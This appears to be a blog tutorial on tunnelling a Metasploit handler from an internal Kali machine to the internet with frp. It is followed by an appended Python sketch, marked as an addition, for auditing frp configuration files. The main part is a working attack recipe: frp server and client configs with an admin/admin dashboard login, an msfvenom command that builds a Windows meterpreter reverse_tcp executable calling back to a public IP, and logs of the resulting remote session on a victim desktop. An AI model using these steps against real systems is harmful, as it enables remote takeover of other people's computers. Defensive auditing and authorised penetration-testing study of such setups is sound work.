Exposing an Internal-Network Metasploit to the Internet

穆风1818 2022-09-28 121 views

Download frp

GitHub project: https://github.com/fatedier/frp

Find the latest release and download it; choose the build that matches your system.

Download steps:

wget https://github.com/fatedier/frp/releases/download/v0.16.1/frp_0.16.1_linux_amd64.tar.gz
tar zxvf frp_0.16.1_linux_amd64.tar.gz
cd frp_0.16.1_linux_amd64

 

Public server configuration:

Edit the configuration file:

[yuyongxr@instance-2 frp_0.16.1_linux_amd64]$ vim frps.ini 
[common]
bind_port = 7000
dashboard_port = 7500
dashboard_user = admin
dashboard_pwd = admin

Start the service:

[yuyongxr@instance-2 frp_0.16.1_linux_amd64]$ nohup ./frps -c frps.ini > log.txt &

 

Kali Linux configuration:

Edit the configuration file:

kali@kali:~/frp_0.16.1_linux_amd64$ vim frpc.ini 
[common]
server_addr = xx.xx.xx.xx
server_port = 7000

[msf]
type = tcp
local_ip = 127.0.0.1
local_port = 6666
remote_port = 4446

Start the service:

kali@kali:~/frp_0.16.1_linux_amd64$ nohup ./frpc -c frpc.ini > log.txt &

Metasploit configuration:

msf5 > use exploit/multi/handler 
msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 127.0.0.1
lhost => 127.0.0.1
msf5 exploit(multi/handler) > set lport 6666
lport => 6666

Generate the payload file:

e2a5e@kali:~$ msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=34.80.29.48 lport=4446 -f exe -o test.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 510 bytes
Final size of exe file: 7168 bytes
Saved as: test.exe

Run the payload file and test the result:

msf5 exploit(multi/handler) > exploit 

[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started reverse TCP handler on 127.0.0.1:6666
[*] Sending stage (206403 bytes) to 127.0.0.1
[*] Meterpreter session 1 opened (127.0.0.1:6666 -> 127.0.0.1:35992) at 2019-09-03 17:05:39 +0800

meterpreter > ls
Listing: C:\Users\win7\Desktop
==============================

Mode              Size      Type  Last modified              Name
----              ----      ----  -------------              ----
100666/rw-rw-rw-  2309      fil   2019-08-30 11:12:41 +0800  Google Chrome.lnk
100777/rwxrwxrwx  10916080  fil   2019-08-30 11:57:01 +0800  PCHunter64.exe
40777/rwxrwxrwx   0         dir   2019-09-03 16:12:02 +0800  PanDownload
100666/rw-rw-rw-  282       fil   2018-09-11 09:18:55 +0800  desktop.ini
100777/rwxrwxrwx  7168      fil   2019-09-03 16:39:18 +0800  test.exe

meterpreter >
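
Added example (not part of the original post, and not frp's own code): a Python sketch for reviewing frp configuration files like the two shown above, for instance when they are recovered from a host during incident response. It flags the admin/admin dashboard login in frps.ini and lists which public endpoint each frpc.ini proxy maps to which local port; the function names and the inline sample configs are constructed for illustration.

```python
import configparser
# Constructed sample inputs that mirror the two configs on this page.
FRPS_INI = """[common]
bind_port = 7000
dashboard_port = 7500
dashboard_user = admin
dashboard_pwd = admin
"""
FRPC_INI = """[common]
server_addr = xx.xx.xx.xx
server_port = 7000

[msf]
type = tcp
local_ip = 127.0.0.1
local_port = 6666
remote_port = 4446
"""

def parse_ini(text):
    # Hypothetical helper: frp's legacy .ini files are plain INI sections.
    cp = configparser.ConfigParser(interpolation=None)
    cp.read_string(text)
    return cp

def audit_frps(text):
    """Findings for an frps.ini: exposed ports and a default dashboard login."""
    common = parse_ini(text)["common"]
    findings = []
    if "bind_port" in common:
        findings.append(f"control channel on port {common['bind_port']}")
    if "dashboard_port" in common:
        findings.append(f"dashboard on port {common['dashboard_port']}")
        if (common.get("dashboard_user"), common.get("dashboard_pwd")) == ("admin", "admin"):
            findings.append("dashboard login is admin/admin")
    return findings

def tunnels(text):
    """Each proxy section of an frpc.ini as (name, type, public, local)."""
    cp = parse_ini(text)
    server = cp["common"].get("server_addr", "unset")
    rows = []
    for name in cp.sections():
        if name == "common":
            continue
        s = cp[name]
        rows.append((name, s.get("type", "unset"),
                     f"{server}:{s.get('remote_port', 'unset')}",
                     f"{s.get('local_ip', 'unset')}:{s.get('local_port', 'unset')}"))
    return rows
```

The public endpoint returned by `tunnels` is the address and port that remote hosts actually connect to, so it is the value to search for in firewall and proxy logs; the session log above only ever shows 127.0.0.1 as the peer.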

 


